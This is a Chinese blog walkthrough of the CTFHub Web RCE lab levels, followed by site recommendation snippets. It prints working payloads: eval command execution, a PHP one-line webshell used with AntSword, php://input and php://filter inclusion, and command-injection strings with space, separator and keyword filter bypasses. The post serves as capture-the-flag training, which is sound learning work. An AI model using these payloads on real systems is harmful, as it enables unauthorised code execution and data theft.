【CTFHub】RCE通关

最新推荐文章于 2024-09-11 15:13:15 发布
最新推荐文章于 2024-09-11 15:13:15 发布
阅读量1.3k 收藏 31
点赞数 23
文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57289348/article/details/140997288
版权

这次做的是CTFHub -> Web -> RCE

1.eval执行

开启环境

使用hackbar插件修改url,构造?cmd=system("ls");,查看根目录

http://challenge-117bdf23cdac9035.sandbox.ctfhub.com:10800/?cmd=system("ls");

输入?cmd=system("cat /flag_9777");查看flag_9777文件得到falg

ctfhub{b7c3f36ea35d84d1dec12405}

2.文件包含

开启环境

这里有一段代码,看到最下边一行提示有shell,点击查看

<?php eval($_REQUEST['ctfhub']);?>

这是一个一句话木马,那我们可以尝试用蚁剑连接

在地址栏输入/?file=shell.txt,打开蚁剑,添加数据,输入地址和密码

http://challenge-9d8fc2693a0b171f.sandbox.ctfhub.com:10800/?file=shell.txt

连接成功,点击打开添加的数据,开始寻找flag

在根目录下成功找到flag

ctfhub{f85af8d445a9985d1c371fc6}

3.php://input

开启环境

根据题目可以知道这题要用php://input伪协议

这里用Burp抓包,发送到Repeater模块

我们这里要改一下数据包,在GET /后拼接?file=php://input,然后想查看一下根目录,在末尾输<?php system("ls /");?>,输入好后点击send,成功查看到根目录

然后要查看flag_7453,在末尾输<?php system("cat /flag_7453");?>,sendflag

ctfhub{a20ab52a15ff1b86c654e63b}

4.读取源代码

开启环境

可以看到这关直接给出了flag的位置,用之前的php://input伪协议burp改包发现不管用了,应该是allow_url_include为off,这个值为on才可以用。

那么我们可以尝试用一下php://filter,来实现对文件的访问

依旧是Burp抓包,扔到Repeatet模块

构造payload,读取/flag

?file=php://filter/resource=/flag

ctfhub{f5e8adda27de145258321b2f}

5.远程包含

开启环境

这关和php://input那关一样,先用Burp抓包,发送到repeater模块

然后构造payload,读取flag

ctfhub{1a13831839c871dbfb8cfd20}

6.命令注入-无过滤

开启环境

使用了ping命令,我们输入127.0.0.1,进行ping

由于没有过滤,直接进行命令的拼接,输入127.0.0.1 | ls

127.0.0.1 | ls

查看文件内容,输入 127.0.0.1 | cat 118402876104.php

127.0.0.1 | cat 118402876104.php

这里结果没有显示,我们需要右击查看页面源码,得到flag

ctfhub{f23a1df3cb94c56a8b0e6b47}

7.命令注入-过滤cat

启动环境

延续上把的思路,输入127.0.0.1 | ls

127.0.0.1 | ls

接下来查看flag_63643248413664.php即可得到flag,这关过滤cat,所以我们选择用head尝试一下

127.0.0.1 | head flag_63643248413664.php

查看源码,得到flag

ctfhub{6a6d3b431709cf59540519a8}

8.命令注入-过滤空格

开启环境

这关过滤空格,所以我们不能使用空格,需要用的时候可以用特殊字符来代替

例如:使用IFS$9、%09、<、>、<>、{,}、%20、${IFS}来代替空格

还是先查看目录下的文件

127.0.0.1|ls

接着查看flag_1382120916005.php

127.0.0.1|cat<flag_1382120916005.php

查看源码,得到flag

ctfhub{6fb3f31fc406c6962477a71d}

9.命令注入-过滤目录分隔符

开启环境

这一关是过滤了目录分隔符/,那就不能直接查看文件夹里的文件了,这里利用分号使两个命令同时进行

查看目录文件

127.0.0.1|ls

查看flag_is_here中的文件

127.0.0.1;cd flag_is_here;ls

查看flag_280218639196.php,查看源码,获得flag

127.0.0.1;cd flag_is_here;cat flag_280218639196.php

ctfhub{b34b9b21858896205ba41f10}

10.命令注入-过滤运算符

开启环境

本关运算符,就是过滤掉了|&

查看目录文件

127.0.0.1;ls

查看flag_2450155772081.php,查看源码,获得flag

127.0.0.1;cat flag_2450155772081.php

ctfhub{50d83f7036b4d320b6f34b76}

12.命令注入-综合练习

开启环境

本关过滤了|&;/catflagctfhub空格

|		&		;		/		cat		flag		ctfhub		空格
; 用 %0a 代替
cat 用 head 代替
空格 用 ${IFS} 替代

查看目录下文件

?ip=127.0.0.1%0als

查看flag_is_here文件夹

?ip=127.0.0.1%0acd${IFS}f***_is_here${IFS}%0als

查看flag_120783017711734.php,查看源码,获得flag

?ip=127.0.0.1%0acd${IFS}f***_is_here%0ahead${IFS}f***_120783017711734.php

ctfhub{eebaec3afd03d21ff8142332}

RCE完结撒花!!!

MoYv70
关注
  • 23
    点赞
  • 31
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTFHUB-RCE通记录以及常见的绕过过滤的方法
不想当脚本小子的脚本小子
03-21 2190
先过,再分析相的防御源代码 1.过滤cat 然后cat 301472130920273.php然后查看网页源代码即可得到flag 2.过滤cat 根据题目要求过滤了cat 而该服务器为Linux系统区分大小写 就无法通过大小写来绕过 本来想使用vi命令替换cat命令也能查看到flag中的内容 但是失败了 最后用了替换法:127.0.0.0 ; $a=ca;$b=t; $a$b flagxxxx 题目源码: <?php $res = FALSE; if (is.
通过ctfhub系统对RCE学习
qq_45584159的博客
12-29 1152
文章目录RCE介绍exce(ping)(远程系统命令执行)一. eval执行函数linux常用的目录操作命令:创建目录:mkdir建空文本文件:touch复制文件:cp移动文件或目录:mv查看文件内容命令:cat删除文件:rm命令注入 RCE介绍 RCE英文全称:remote command/code execute(远程命令/代码执行漏洞) 分为远程命令执行ping和远程代码执行evel。 漏洞出现的原因:没有在输入口做输入处理。 我们常见的路由器、防火墙、入侵检测等设备的web管理界面上 一般会给用户
ctfhubrce 通笔记
2301_80489197的博客
04-18 278
这里进行了对cat的过滤,通过preg_match_all()函数在变量ip和m中搜索“cat”字符串,如果里面没有“cat”字符串,则会进行ping命令。这一将||和&给过滤了,但是还可以用其他没有被过滤的运算符进行拼接。通过反斜杠‘\’或者单引号进行绕过,也可以用tac命令来反向输出。先用ls查看一下当前目录下有那些文件,看到flag,去看一下。可以看到这一是没有任何过滤的,所以可以直接用‘|’进行拼接。ping完后页面上什么也没有,但是在源码中可以看到flag。看到flag,再去看一下。
Linux文件系统--文件类型
Ucan_Uup的博客
09-08 1082
Linux中一切都是文件,文件类型有多种,使用ls -l命令可以查看文件属性,所显示结果的第一列的第一个字符用来表示文件类型,如下: 1.普通文件 第一列第一个字符为“-”的文件为普通文件。 创建普通文件我们用:touch newfile 命令 删除普通文件我们用:rm newfile 命令 2.目录文件 第一列第一个字符为“d”(directory)的文件为目录文件。 创建目录文件我们用:mkdir directory 命令 删除空目录文件我们用:rmdir directory 命令 删除非空目录文件
ctfhub rce
zbbjya的博客
01-27 1646
eval执行 使用蚁剑打开然后 就可以得到flag了 文件包含 打开界面 php://input 伪协议相当于一个削弱post的方法 input 使用bp该包将改头 然后发送到repeater 在界面中加入<?php system("ls /");?> 从raw中我们会看到 flag_11583 要从中得到flag使用 读取源代码 从图片中我们可以看出问题所在 使用bp抓包然后发送到repeater php://filter 任意文件读取 ?file=php://filter
CTFHubRCE - 文件包含
cx_sam的博客
08-07 1727
CTF WEB RCE 文件包含
ctfhub RCE
08-18
CTFHub RCE(Remote Code Execution)是指在CTFHub平台上利用漏洞或安全问题,远程执行恶意代码或命令的攻击行为。这种攻击通常会利用软件或网站存在的漏洞,通过远程执行代码来获取非授权的访问权限或对系统进行...
CTFhub RCE 命令注入部分
qq_41497476的博客
07-01 1253
这种题其实已经比较熟悉了,使用 |,&&,;等分隔符对前面ping的内容进行隔断,然后执行自己的命令 任意值;ls 发现了除了目录下除了index.php外还有另一个php文件 输入 127.0.0.0;cat 21701615624125.php 发现确实多了个反馈的参数,但是看不到值,很疑惑后面知道了,这是因为cat命令反馈的值无法直接显示 这时有两个方法,一是直接查看源码 源码里是能看到的 第二个方法是直接把命令改为 127.0.0.1;cat 27712282015742.php.
高德地图SDK Android版开发 10 InfoWindow
程序喵D的博客
09-06 2015
前文介绍高德地图添加Marker覆盖物的使用方法,Marker结合InfoWindow可展示更详尽的信息。本文将介绍以下内容:1. 使用SDK默认样式显示InfoWindow的方法;2. 自定义InfoWindow样式的方法。
攻防世界 Web_php_unserialize
beiweixiaotian66的博客
09-07 662
因为GET传参还要经过一个Base64的解码,所以对这个表达式还要经过base64的加密。因为前面还有个正则表达式,所以我们还需要绕过这个正则表达式,使用。然后我们知道怎么绕过了,可不可以直接自己手动绕过,base加密捏。如果表示对象属性个数的值大于真实的属性个数时,就可以绕过。代表着后面的变量名长度应是10,但好像只有八位?表示空字符,但是还是占用一个字符位置。但是这样的base和上面不一样。,这样base出来就是一样的了。方法,写一个反序列化的脚本。这道题我们需要的文件是。,所以我们主要需要绕过。
案例——Mysql主从复制与读写分离
shuaianm的博客
09-05 1750
读写分离,基本的原理是让主数据库处理事务性增、改、删操作(INSERT、UPDATE、DELETE),而从 数据库处理SELECT查询操作。数据库复制被用来把事务性操作导致的变更同步到集群中的从数据库。
Android13默认开启电池百分比数字显示Framework
技术的积累,其实就是财富的积累呀。
09-05 403
通过,0,1 的切换,可以修改默认显示电池数字百分比,或不显示电池数字百分比的效果。修改2个地方,一个是Setting,一个是SystemUI显示。通过查阅Framework代码。终于找到了如何默认显示。查了很多平台,就是没有Android13的。有个小需求,需要实现。
Android】ViewPager基本用法总结
Patrick_yuxuan的博客
09-06 1217
ViewPager是 Android 中一个用于在同一屏幕上滑动不同页面(通常是左右滑动)的组件。它通常用于实现多页面滑动效果,比如应用的引导页、图片轮播、以及支持标签导航的界面。ViewPager与结合使用。是一个适配器,它负责为ViewPager提供页面内容。每个页面通常是一个Fragment,也可以是一个普通的View。
Android 生成so库 并调用
xige1995的博客
09-11 268
上面的内容生成so库及给java代码调用就完成了。MainActivity.class中进行引用。native-lib.cpp增加方法。
Thinkphp5 + Swoole实现邮箱异步通知
最新发布
Crazy_shark的博客
09-11 337
通过 Swoole 实现的异步任务处理机制,可以将耗时操作如发送邮件等操作放入后台异步执行,提升用户体验和系统性能。Swoole 的 Task 机制非常适合处理这种场景,结合 ThinkPHP 使得开发异步任务更加简单高效。
Android 应用程序中判断用户是否在国内
LLZjiayou的博客
09-05 614
要在 Android 应用程序中判断用户是否在国内,并根据地理位置进行不同的操作,你可以使用Locale类和类来检测用户的国家/地区,或者使用 IP 地址进行地理定位。以下是一个简单的 Java 代码示例,它根据用户是否在中国来做出不同的操作。
charles配置安卓抓包(避坑版)
qq_43557600的博客
09-08 421
B版块(证书安装到System,能抓更多的包)A版块(证书安装到user)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值